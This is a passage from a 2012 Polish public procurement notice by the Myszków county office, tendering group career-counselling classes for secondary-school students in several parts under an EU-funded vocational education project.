9.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Z chwilą ustanowienia pełnomocnika istnieje obowiązek załączenia pełnomocnictwa. Przepisy dotyczące pojedynczego Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
Jeżeli oferta Wykonawców wspólnie ubiegających się o zamówienie zostanie wybrana jako najkorzystniejsza, Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy(ów), w przypadku wystąpienia okoliczności wymienionej poniżej:
1.Zamawiający dopuszcza możliwość przesunięcia terminu i wydłużenia okresu realizacji zamówienia w przypadku:
a) przedłużającego się terminu wyłonienia kandydatów do udziału w zajęciach   z doradztwa grupowego
b)wystąpienia przyczyn obiektywnych, losowych niezawinionych przez Wykonawcę lub Zamawiającego
Zmiany można dokonać za zgodą Zamawiającego wyłącznie w drodze pisemnej.
2.Podstawą do przesunięcia terminu i wydłużenia okresu realizacji zamówienia nie może być realizacja przez Wykonawcę zamówienia w kilku jego zakresach. 
3.Zamawiający przewiduje możliwość zmiany wykładowców wskazanych przez Wykonawcę(ów) w ofercie. Zmiany można dokonać z zgodą Zamawiającego. W przypadku zmiany wykładowców, zgoda może być udzielona pod warunkiem zapewnienia przez Wykonawcę nowych wykładowców, którzy posiadają wykształcenie, doświadczenie i kwalifikacje co najmniej takie same jak osoby nimi zastępowane, wskazane w ofercie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.powiatmyszkowski.bip.net.pl/?c=207<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Myszkowie, ul. Pułaskiego 6, 42-300 Myszków, pokój nr 308 (III piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.08.2012 godzina 10:00, miejsce: Starostwo Powiatowe w Myszkowie, 42 - 300 Myszków, ul. Pułaskiego 6, Biuro Podawcze na Sali Obsługi Interesantów (parter) stanowisko nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia finansowany jest przez Unię Europejską ze środków Europejskiego Funduszu Społecznego  w ramach projektu pn. Mam zawód - mam pracę w regionie Priorytet IX Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego Programu Operacyjnego Kapitał Ludzki 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przedmiotem zamówienia jest usługa przeprowadzenia zajęć z doradztwa grupowego dla uczniów szkół ponadgimnazjalnych w powiecie myszkowskim w roku szkolnym 2012/2013.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa przeprowadzenia zajęć z doradztwa grupowego dla uczniów szkół ponadgimnazjalnych w powiecie myszkowskim w roku szkolnym 2012/2013
Zakres 1
Usługa grupowego doradztwa zawodowego na rzecz uczniów Technikum nr 2 w Zespole Szkół nr 2 im. H. Kołłątaja w Myszkowie, ul. Pułaskiego 70, 42-300 Myszków w  grupie liczącej maksymalnie 15 osób w godzinach nie pokrywających się z godzinami zajęć lekcyjnych tych uczniów. Doradztwo grupowe będzie się odbywać nie mniej niż 4 razy w tygodniu po 3 godziny lekcyjne w każdym dniu. Zakres zamówienia obejmuje grupowe doradztwo zawodowe na rzecz uczniów w wymiarze 24 godzin lekcyjnych (po 45 minut każda) świadczone w okresie maksymalnie 4 tygodni od dnia rozpoczęcia zajęć z doradztwa grupowego. Przy czym doradztwo grupowe rozpocznie się począwszy od dnia 16.10.2012r. 
Zamawiający dopuszcza możliwość przesunięcia terminu i wydłużenia okresu realizacji  zamówienia.
2.Informacje dotyczące wszystkich zakresów
Zajęcia z doradztwa grupowego obejmować będą problematykę z zakresu poruszania się po rynku pracy (m.in. zasady pisania CV i listu motywacyjnego, przygotowanie do rozmowy kwalifikacyjnej, gry symulacyjne), podstaw przedsiębiorczości, stereotypów płci, zasad równości, równouprawnienia i przykładów dyskryminacji na rynku pracy. 
Doradztwo grupowe będzie prowadzone w oparciu o materiały dydaktyczne przekazane przez Zamawiającego tj. podręcznik doradcy/ konsultanta zawodowego przygotowany przez Kuratorium Oświaty stanowiący załącznik nr 9 do SIWZ. 
W ramach ostatnich zajęć z doradztwa grupowego konsultant przeprowadzi z uczestnikami ankiety zgodnie ze wzorem przekazanym przez Zamawiającego; wypełnione przez uczestników ankiety Wykonawca przekaże Zamawiającemu.
Wykonawca zobowiązany jest do przedłożenia Zamawiającemu podpisanych przez uczestników list obecności na zajęciach z doradztwa grupowego (wzór listy Zamawiający przekaże Wykonawcy) niezwłocznie po wykonaniu usługi. Listy obecności oraz wypełnione przez uczestników ankiety będą stanowiły podstawę stwierdzenia realizacji zamówienia. 
Do przeprowadzenia zajęć Zamawiający zapewni konsultantowi zawodowemu bezpłatnie sale wykładowe znajdujące się w Zespole Szkół wskazanym w opisie zakresu zamówienia, które Wykonawca będzie realizował. Wykonawca pokrywa koszty dojazdu do sal wykładowych oraz wszelkie inne koszty związane ze świadczeniem usługi w tym wydruki materiałów. 
Przedmiot zamówienia będzie realizowany zgodnie z harmonogramem:
1.W terminie do 5 dni kalendarzowych od podpisania umowy Zamawiający przekaże Wykonawcy:
a)wzór listy obecności na zajęciach z doradztwa grupowego,
b)wzór ankiety uczestnika doradztwa,
2.Na 6 dni kalendarzowych przed rozpoczęciem zajęć w ramach doradztwa grupowego Zamawiający przekaże wykonawcy:
a)imienną listę uczestników doradztwa grupowego,
b)proponowane terminy prowadzenia zajęć z doradztwa grupowego.
3.Na 2 dni kalendarzowe przed rozpoczęciem zajęć w ramach doradztwa grupowego Wykonawca przekaże Zamawiającemu harmonogram zajęć w ramach doradztwa grupowego.
4.Zajęcia w ramach doradztwo grupowego rozpoczną się począwszy od dnia 16.10.2012r. Przy czym, Zamawiający dopuszcza możliwość przesunięcia terminu i wydłużenia okresu realizacji zamówienia w przypadkach określonych w pkt XVI SIWZ.
5.W terminie do 3 dni kalendarzowych od dnia zakończenia zajęć w ramach doradztwa grupowego, Wykonawca przekaże Zamawiającemu:
a)podpisane przez uczniów uczestniczących w zajęciach doradztwa grupowego listy obecności,
b)wypełnione przez uczestników doradztwa grupowego ankiety.  
6.Po wykonaniu zajęć z doradztwa grupowego, zostanie sporządzony protokół odbioru usługi, podpisany przez Wykonawcę i Zamawiającego. Podpisanie bez zastrzeżeń przez obie Strony protokołu odbioru z wykonania usługi jest podstawą do wystawienia faktury/ rachunku za wykonanie usługi.
7.Wykonawca przekaże Zamawiającemu najpóźniej dnia następnego po podpisaniu umowy informacje niezbędne do dokonania zgłoszenia Wykonawcy do ubezpieczenia społecznego. (jeżeli obowiązek taki wynika z przepisów).
3.Do obowiązków Wykonawcy należy :
a)pozostawanie w stałym kontakcie z Zamawiającym ( spotkania odpowiednio 
do potrzeb, kontakt telefoniczny, e-mailowy );
b) informowanie Zamawiającego o stanie realizacji usługi oraz niezwłoczne, pisemne powiadamianie Zamawiającego o pojawiających się problemach istotnych dla realizacji  usługi;
c)  świadczenie usługi w wymiarze godzinowym określonym przez Zamawiającego w   
miarę jego potrzeb, od poniedziałku do piątku  z wyjątkiem dni ustawowo wolnych   
 od pracy, w czasie nie pokrywającym się z godzinami zajęć lekcyjnych uczniów 	(przedział godzin: 8:00-19:00).   
W uzasadnionych przypadkach, za zgodą uczestników projektów i po akceptacji 
Zamawiającego, możliwa jest realizacja zajęć w sobotę. Szczegółowy wymiar    
godzinowy oraz terminy realizacji przedmiotu umowy ( harmonogram ) ustalone   
zostaną ze szkolnymi koordynatorami projektu, przy akceptacji Zamawiającego,  
w oparciu o analizę planów lekcji, na 2 dni kalendarzowe przed rozpoczęciem 	planowanych  zajęć; 
d) realizacja usługi na terenie wskazanych przez Zamawiającego szkoły/szkół z powiatu myszkowskiego ( zgodnie z zapisami SIWZ ) na podstawie przekazanego 
podręcznika, prowadzenie dokumentacji usług w formie pisanej i fotograficznej;
e) wykorzystywanie wszystkich materiałów i dokumentów przekazanych przez  
Zamawiającego, stosowanie wytycznych w zakresie oznaczania projektów w ramach PO KL i Księgi Identyfikacji  Wizualnej Narodowej Strategii Spójności, 
umieszczenie na wszystkich materiałach godła Unii Europejskiej  oraz logo  Programu Operacyjnego Kapitał Ludzki oraz informacji o współfinansowaniu  materiałów ze środków UE w ramach PO KL (zgodnie z wytycznymi dotyczącymi 	oznaczenia projektu, dostępnymi na stronie www.efs.gov.pl);
f)  Wykonawca podda się okresowej kontroli i ocenie realizacji zamówienia, w szczególności w celu zbadania stanu realizacji umowy tj. jej efektywności, 
rzetelności i jakości oraz prawidłowości prowadzonej dokumentacji 
okołoprojektowej.
4.Zamawiający zastrzega sobie prawo do kontroli i monitoringu pracy Wykonawcy.
5.Z wybranym/i w drodze postępowania Wykonawcą/Wykonawcami Zamawiający zawrze umowę/umowy zgodne z załącznikiem nr 8 do SIWZ (jeden wzór dla wszystkich zakresów) z uwzględnieniem jego/ich formy organizacyjno - prawnej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 16.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiotem zamówienia jest usługa przeprowadzenia zajęć z doradztwa grupowego dla uczniów szkół ponadgimnazjalnych w powiecie myszkowskim w roku szkolnym 2012/2013.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa przeprowadzenia zajęć z doradztwa grupowego dla uczniów szkół ponadgimnazjalnych w powiecie myszkowskim w roku szkolnym 2012/2013
Zakres 2
Usługa grupowego doradztwa zawodowego na rzecz uczniów Technikum nr 2 w Zespole Szkół nr 2 im. H. Kołłątaja w Myszkowie, ul. Pułaskiego 70, 42-300 Myszków w  grupie liczącej maksymalnie 15 osób w godzinach nie pokrywających się z godzinami zajęć lekcyjnych tych uczniów. Doradztwo grupowe będzie się odbywać nie mniej niż 4 razy w tygodniu po 3 godziny lekcyjne w każdym dniu. Zakres zamówienia obejmuje grupowe doradztwo zawodowe na rzecz uczniów w wymiarze 24 godzin lekcyjnych (po 45 minut każda) świadczone w okresie maksymalnie 4 tygodni od dnia rozpoczęcia zajęć z doradztwa grupowego. Przy czym doradztwo grupowe rozpocznie się począwszy od dnia 16.10.2012r. 
Zamawiający dopuszcza możliwość przesunięcia terminu i wydłużenia okresu realizacji  zamówienia.
2.Informacje dotyczące wszystkich zakresów
Zajęcia z doradztwa grupowego obejmować będą problematykę z zakresu poruszania się po rynku pracy (m.in. zasady pisania CV i listu motywacyjnego, przygotowanie do rozmowy kwalifikacyjnej, gry symulacyjne), podstaw przedsiębiorczości, stereotypów płci, zasad równości, równouprawnienia i przykładów dyskryminacji na rynku pracy. 
Doradztwo grupowe będzie prowadzone w oparciu o materiały dydaktyczne przekazane przez Zamawiającego tj. podręcznik doradcy/ konsultanta zawodowego przygotowany przez Kuratorium Oświaty stanowiący załącznik nr 9 do SIWZ. 
W ramach ostatnich zajęć z doradztwa grupowego konsultant przeprowadzi z uczestnikami ankiety zgodnie ze wzorem przekazanym przez Zamawiającego; wypełnione przez uczestników ankiety Wykonawca przekaże Zamawiającemu.
Wykonawca zobowiązany jest do przedłożenia Zamawiającemu podpisanych przez uczestników list obecności na zajęciach z doradztwa grupowego (wzór listy Zamawiający przekaże Wykonawcy) niezwłocznie po wykonaniu usługi. Listy obecności oraz wypełnione przez uczestników ankiety będą stanowiły podstawę stwierdzenia realizacji zamówienia. 
Do przeprowadzenia zajęć Zamawiający zapewni konsultantowi zawodowemu bezpłatnie sale wykładowe znajdujące się w Zespole Szkół wskazanym w opisie zakresu zamówienia, które Wykonawca będzie realizował. Wykonawca pokrywa koszty dojazdu do sal wykładowych oraz wszelkie inne koszty związane ze świadczeniem usługi w tym wydruki materiałów. 
Przedmiot zamówienia będzie realizowany zgodnie z harmonogramem:
1.W terminie do 5 dni kalendarzowych od podpisania umowy Zamawiający przekaże Wykonawcy:
a)wzór listy obecności na zajęciach z doradztwa grupowego,
b)wzór ankiety uczestnika doradztwa,
2.Na 6 dni kalendarzowych przed rozpoczęciem zajęć w ramach doradztwa grupowego Zamawiający przekaże wykonawcy:
a)imienną listę uczestników doradztwa grupowego,
b)proponowane terminy prowadzenia zajęć z doradztwa grupowego.
3.Na 2 dni kalendarzowe przed rozpoczęciem zajęć w ramach doradztwa grupowego Wykonawca przekaże Zamawiającemu harmonogram zajęć w ramach doradztwa grupowego.
4.Zajęcia w ramach doradztwo grupowego rozpoczną się począwszy od dnia 16.10.2012r. Przy czym, Zamawiający dopuszcza możliwość przesunięcia terminu i wydłużenia okresu realizacji zamówienia w przypadkach określonych w pkt XVI SIWZ.
5.	W terminie do 3 dni kalendarzowych od dnia zakończenia zajęć w ramach doradztwa grupowego, Wykonawca przekaże Zamawiającemu:
a)	podpisane przez uczniów uczestniczących w zajęciach doradztwa grupowego listy obecności,
b)	wypełnione przez uczestników doradztwa grupowego ankiety.  
6.	Po wykonaniu zajęć z doradztwa grupowego, zostanie sporządzony protokół odbioru usługi, podpisany przez Wykonawcę i Zamawiającego. Podpisanie bez zastrzeżeń przez obie Strony protokołu odbioru z wykonania usługi jest podstawą do wystawienia faktury/ rachunku za wykonanie usługi.
7.	Wykonawca przekaże Zamawiającemu najpóźniej dnia następnego po podpisaniu umowy informacje niezbędne do dokonania zgłoszenia Wykonawcy do ubezpieczenia społecznego. (jeżeli obowiązek taki wynika z przepisów).

3.	Do obowiązków Wykonawcy należy :

     a)   pozostawanie w stałym kontakcie z Zamawiającym ( spotkania odpowiednio 
           do potrzeb, kontakt telefoniczny, e-mailowy );
     b) informowanie Zamawiającego o stanie realizacji usługi oraz niezwłoczne, pisemne powiadamianie Zamawiającego o pojawiających się problemach istotnych dla realizacji  
           usługi;
     c)  świadczenie usługi w wymiarze godzinowym określonym przez Zamawiającego w   
          miarę jego potrzeb, od poniedziałku do piątku  z wyjątkiem dni ustawowo wolnych   
          od pracy, w czasie nie pokrywającym się z godzinami zajęć lekcyjnych uczniów 	(przedział godzin: 8:00-19:00).   
          W uzasadnionych przypadkach, za zgodą uczestników projektów i po akceptacji 
          Zamawiającego, możliwa jest realizacja zajęć w sobotę. Szczegółowy wymiar    
          godzinowy oraz terminy realizacji przedmiotu umowy ( harmonogram ) ustalone   
          zostaną ze szkolnymi koordynatorami projektu, przy akceptacji Zamawiającego,  
          w oparciu o analizę planów lekcji, na 2 dni kalendarzowe przed rozpoczęciem 	planowanych  zajęć; 
      d) realizacja usługi na terenie wskazanych przez Zamawiającego szkoły/szkół z powiatu 
          myszkowskiego ( zgodnie z zapisami SIWZ ) na podstawie przekazanego 
          podręcznika, prowadzenie dokumentacji usług w formie pisanej i fotograficznej;
      e)  wykorzystywanie wszystkich materiałów i dokumentów przekazanych przez  
           Zamawiającego, stosowanie wytycznych w zakresie oznaczania projektów                     
           w ramach PO KL i Księgi Identyfikacji  Wizualnej Narodowej Strategii Spójności, 
           umieszczenie na wszystkich materiałach godła Unii Europejskiej  oraz logo 
           Programu Operacyjnego Kapitał Ludzki oraz informacji o współfinansowaniu 
           materiałów ze środków UE w ramach PO KL (zgodnie z wytycznymi dotyczącymi 	oznaczenia projektu, dostępnymi na stronie www.efs.gov.pl);

      f)   Wykonawca podda się okresowej kontroli i ocenie realizacji zamówienia,                 
           w szczególności w celu zbadania stanu realizacji umowy tj. jej efektywności, 
           rzetelności i jakości oraz prawidłowości prowadzonej dokumentacji 
           okołoprojektowej.

4.	Zamawiający zastrzega sobie prawo do kontroli i monitoringu pracy Wykonawcy.


5.	Z wybranym/i w drodze postępowania Wykonawcą/Wykonawcami Zamawiający zawrze umowę/umowy zgodne z załącznikiem nr 8 do SIWZ (jeden wzór dla wszystkich zakresów) z uwzględnieniem jego/ich formy organizacyjno - prawnej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 16.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przedmiotem zamówienia jest usługa przeprowadzenia zajęć z doradztwa grupowego dla uczniów szkół ponadgimnazjalnych w powiecie myszkowskim w roku szkolnym 2012/2013.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa przeprowadzenia zajęć z doradztwa grupowego dla uczniów szkół ponadgimnazjalnych w powiecie myszkowskim w roku szkolnym 2012/2013
Zakres 3
Usługa grupowego doradztwa zawodowego na rzecz uczniów w Zespole Szkół nr 1 im. E. Kwiatkowskiego w Myszkowie, ul. Kwiatkowskiego 18, 42-300 Myszków w  grupie liczącej maksymalnie 30 osób w godzinach nie pokrywających się z godzinami zajęć lekcyjnych tych uczniów. Doradztwo grupowe będzie się odbywać nie mniej niż 4 razy w tygodniu po 3 godziny lekcyjne w każdym dniu. Zakres zamówienia obejmuje grupowe doradztwo zawodowe na rzecz uczniów w wymiarze 24 godzin lekcyjnych (po 45 minut każda) świadczone w okresie maksymalnie 4 tygodni od dnia rozpoczęcia zajęć z doradztwa grupowego. Przy czym doradztwo grupowe rozpocznie się począwszy od dnia 16.10.2012r. 
Zamawiający dopuszcza możliwość przesunięcia terminu i wydłużenia okresu realizacji  zamówienia.
2.	Informacje dotyczące wszystkich zakresów

Zajęcia z doradztwa grupowego obejmować będą problematykę z zakresu poruszania się po rynku pracy (m.in. zasady pisania CV i listu motywacyjnego, przygotowanie do rozmowy kwalifikacyjnej, gry symulacyjne), podstaw przedsiębiorczości, stereotypów płci, zasad równości, równouprawnienia i przykładów dyskryminacji na rynku pracy. 
Doradztwo grupowe będzie prowadzone w oparciu o materiały dydaktyczne przekazane przez Zamawiającego tj. podręcznik doradcy/ konsultanta zawodowego przygotowany przez Kuratorium Oświaty stanowiący załącznik nr 9 do SIWZ. 
W ramach ostatnich zajęć z doradztwa grupowego konsultant przeprowadzi z uczestnikami ankiety zgodnie ze wzorem przekazanym przez Zamawiającego; wypełnione przez uczestników ankiety Wykonawca przekaże Zamawiającemu.
Wykonawca zobowiązany jest do przedłożenia Zamawiającemu podpisanych przez uczestników list obecności na zajęciach z doradztwa grupowego (wzór listy Zamawiający przekaże Wykonawcy) niezwłocznie po wykonaniu usługi. Listy obecności oraz wypełnione przez uczestników ankiety będą stanowiły podstawę stwierdzenia realizacji zamówienia. 

Do przeprowadzenia zajęć Zamawiający zapewni konsultantowi zawodowemu bezpłatnie sale wykładowe znajdujące się w Zespole Szkół wskazanym w opisie zakresu zamówienia, które Wykonawca będzie realizował. Wykonawca pokrywa koszty dojazdu do sal wykładowych oraz wszelkie inne koszty związane ze świadczeniem usługi w tym wydruki materiałów. 

Przedmiot zamówienia będzie realizowany zgodnie z harmonogramem:
1.	W terminie do 5 dni kalendarzowych od podpisania umowy Zamawiający przekaże Wykonawcy:
a)	wzór listy obecności na zajęciach z doradztwa grupowego,
b)	wzór ankiety uczestnika doradztwa,
2.	Na 6 dni kalendarzowych przed rozpoczęciem zajęć w ramach doradztwa grupowego Zamawiający przekaże wykonawcy:
a)	imienną listę uczestników doradztwa grupowego,
b)	proponowane terminy prowadzenia zajęć z doradztwa grupowego.
3.	Na 2 dni kalendarzowe przed rozpoczęciem zajęć w ramach doradztwa grupowego Wykonawca przekaże Zamawiającemu harmonogram zajęć w ramach doradztwa grupowego.
4.	Zajęcia w ramach doradztwo grupowego rozpoczną się począwszy od dnia 16.10.2012r. Przy czym, Zamawiający dopuszcza możliwość przesunięcia terminu i wydłużenia okresu realizacji zamówienia w przypadkach określonych w pkt XVI SIWZ.
5.	W terminie do 3 dni kalendarzowych od dnia zakończenia zajęć w ramach doradztwa grupowego, Wykonawca przekaże Zamawiającemu:
a)	podpisane przez uczniów uczestniczących w zajęciach doradztwa grupowego listy obecności,
b)	wypełnione przez uczestników doradztwa grupowego ankiety.  
6.	Po wykonaniu zajęć z doradztwa grupowego, zostanie sporządzony protokół odbioru usługi, podpisany przez Wykonawcę i Zamawiającego. Podpisanie bez zastrzeżeń przez obie Strony protokołu odbioru z wykonania usługi jest podstawą do wystawienia faktury/ rachunku za wykonanie usługi.
7.	Wykonawca przekaże Zamawiającemu najpóźniej dnia następnego po podpisaniu umowy informacje niezbędne do dokonania zgłoszenia Wykonawcy do ubezpieczenia społecznego. (jeżeli obowiązek taki wynika z przepisów).

3.	Do obowiązków Wykonawcy należy :

     a)   pozostawanie w stałym kontakcie z Zamawiającym ( spotkania odpowiednio 
           do potrzeb, kontakt telefoniczny, e-mailowy );
     b) informowanie Zamawiającego o stanie realizacji usługi oraz niezwłoczne, pisemne powiadamianie Zamawiającego o pojawiających się problemach istotnych dla realizacji  
           usługi;
     c)  świadczenie usługi w wymiarze godzinowym określonym przez Zamawiającego w   
          miarę jego potrzeb, od poniedziałku do piątku  z wyjątkiem dni ustawowo wolnych   
          od pracy, w czasie nie pokrywającym się z godzinami zajęć lekcyjnych uczniów 	(przedział godzin: 8:00-19:00).   
          W uzasadnionych przypadkach, za zgodą uczestników projektów i po akceptacji 
          Zamawiającego, możliwa jest realizacja zajęć w sobotę. Szczegółowy wymiar    
          godzinowy oraz terminy realizacji przedmiotu umowy ( harmonogram ) ustalone   
          zostaną ze szkolnymi koordynatorami projektu, przy akceptacji Zamawiającego,  
          w oparciu o analizę planów lekcji, na 2 dni kalendarzowe przed rozpoczęciem 	planowanych  zajęć; 
      d) realizacja usługi na terenie wskazanych przez Zamawiającego szkoły/szkół z powiatu 
          myszkowskiego ( zgodnie z zapisami SIWZ ) na podstawie przekazanego 
          podręcznika, prowadzenie dokumentacji usług w formie pisanej i fotograficznej;
      e)  wykorzystywanie wszystkich materiałów i dokumentów przekazanych przez  
           Zamawiającego, stosowanie wytycznych w zakresie oznaczania projektów                     
           w ramach PO KL i Księgi Identyfikacji  Wizualnej Narodowej Strategii Spójności, 
           umieszczenie na wszystkich materiałach godła Unii Europejskiej  oraz logo 
           Programu Operacyjnego Kapitał Ludzki oraz informacji o współfinansowaniu 
           materiałów ze środków UE w ramach PO KL (zgodnie z wytycznymi dotyczącymi 	oznaczenia projektu, dostępnymi na stronie www.efs.gov.pl);

      f)   Wykonawca podda się okresowej kontroli i ocenie realizacji zamówienia,                 
           w szczególności w celu zbadania stanu realizacji umowy tj. jej efektywności, 
           rzetelności i jakości oraz prawidłowości prowadzonej dokumentacji 
           okołoprojektowej.

4.	Zamawiający zastrzega sobie prawo do kontroli i monitoringu pracy Wykonawcy.


5.	Z wybranym/i w drodze postępowania Wykonawcą/Wykonawcami Zamawiający zawrze umowę/umowy zgodne z załącznikiem nr 8 do SIWZ (jeden wzór dla wszystkich zakresów) z uwzględnieniem jego/ich formy organizacyjno - prawnej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 16.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przedmiotem zamówienia jest usługa przeprowadzenia zajęć z doradztwa grupowego dla uczniów szkół ponadgimnazjalnych w powiecie myszkowskim w roku szkolnym 2012/2013.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa przeprowadzenia zajęć z doradztwa grupowego dla uczniów szkół ponadgimnazjalnych w powiecie myszkowskim w roku szkolnym 2012/2013
Zakres 4
Usługa grupowego doradztwa zawodowego na rzecz uczniów w Zespole Szkół nr 1 im. E. Kwiatkowskiego w Myszkowie, ul. Kwiatkowskiego 18, 42-300 Myszków w  grupie liczącej maksymalnie 30 osób w godzinach nie pokrywających się z godzinami zajęć lekcyjnych tych uczniów. Doradztwo grupowe będzie się odbywać nie mniej niż 4 razy w tygodniu po 3 godziny lekcyjne w każdym dniu. Zakres zamówienia obejmuje grupowe doradztwo zawodowe na rzecz uczniów w wymiarze 24 godzin lekcyjnych (po 45 minut każda) świadczone w okresie maksymalnie 4 tygodni od dnia rozpoczęcia zajęć z doradztwa grupowego. Przy czym doradztwo grupowe rozpocznie się począwszy od dnia 16.10.2012r. 
Zamawiający dopuszcza możliwość przesunięcia terminu i wydłużenia okresu realizacji  zamówienia.
2.	Informacje dotyczące wszystkich zakresów

Zajęcia z doradztwa grupowego obejmować będą problematykę z zakresu poruszania się po rynku pracy (m.in. zasady pisania CV i listu motywacyjnego, przygotowanie do rozmowy kwalifikacyjnej, gry symulacyjne), podstaw przedsiębiorczości, stereotypów płci, zasad równości, równouprawnienia i przykładów dyskryminacji na rynku pracy. 
Doradztwo grupowe będzie prowadzone w oparciu o materiały dydaktyczne przekazane przez Zamawiającego tj. podręcznik doradcy/ konsultanta zawodowego przygotowany przez Kuratorium Oświaty stanowiący załącznik nr 9 do SIWZ. 
W ramach ostatnich zajęć z doradztwa grupowego konsultant przeprowadzi z uczestnikami ankiety zgodnie ze wzorem przekazanym przez Zamawiającego; wypełnione przez uczestników ankiety Wykonawca przekaże Zamawiającemu.
Wykonawca zobowiązany jest do przedłożenia Zamawiającemu podpisanych przez uczestników list obecności na zajęciach z doradztwa grupowego (wzór listy Zamawiający przekaże Wykonawcy) niezwłocznie po wykonaniu usługi. Listy obecności oraz wypełnione przez uczestników ankiety będą stanowiły podstawę stwierdzenia realizacji zamówienia. 

Do przeprowadzenia zajęć Zamawiający zapewni konsultantowi zawodowemu bezpłatnie sale wykładowe znajdujące się w Zespole Szkół wskazanym w opisie zakresu zamówienia, które Wykonawca będzie realizował. Wykonawca pokrywa koszty dojazdu do sal wykładowych oraz wszelkie inne koszty związane ze świadczeniem usługi w tym wydruki materiałów. 

Przedmiot zamówienia będzie realizowany zgodnie z harmonogramem:
1.	W terminie do 5 dni kalendarzowych od podpisania umowy Zamawiający przekaże Wykonawcy:
a)	wzór listy obecności na zajęciach z doradztwa grupowego,
b)	wzór ankiety uczestnika doradztwa,
2.	Na 6 dni kalendarzowych przed rozpoczęciem zajęć w ramach doradztwa grupowego Zamawiający przekaże wykonawcy:
a)	imienną listę uczestników doradztwa grupowego,
b)	proponowane terminy prowadzenia zajęć z doradztwa grupowego.
3.	Na 2 dni kalendarzowe przed rozpoczęciem zajęć w ramach doradztwa grupowego Wykonawca przekaże Zamawiającemu harmonogram zajęć w ramach doradztwa grupowego.
4.	Zajęcia w ramach doradztwo grupowego rozpoczną się począwszy od dnia 16.10.2012r. Przy czym, Zamawiający dopuszcza możliwość przesunięcia terminu i wydłużenia okresu realizacji zamówienia w przypadkach określonych w pkt XVI SIWZ.
5.	W terminie do 3 dni kalendarzowych od dnia zakończenia zajęć w ramach doradztwa grupowego, Wykonawca przekaże Zamawiającemu:
a)	podpisane przez uczniów uczestniczących w zajęciach doradztwa grupowego listy obecności,
b)	wypełnione przez uczestników doradztwa grupowego ankiety.  
6.	Po wykonaniu zajęć z doradztwa grupowego, zostanie sporządzony protokół odbioru usługi, podpisany przez Wykonawcę i Zamawiającego. Podpisanie bez zastrzeżeń przez obie Strony protokołu odbioru z wykonania usługi jest podstawą do wystawienia faktury/ rachunku za wykonanie usługi.
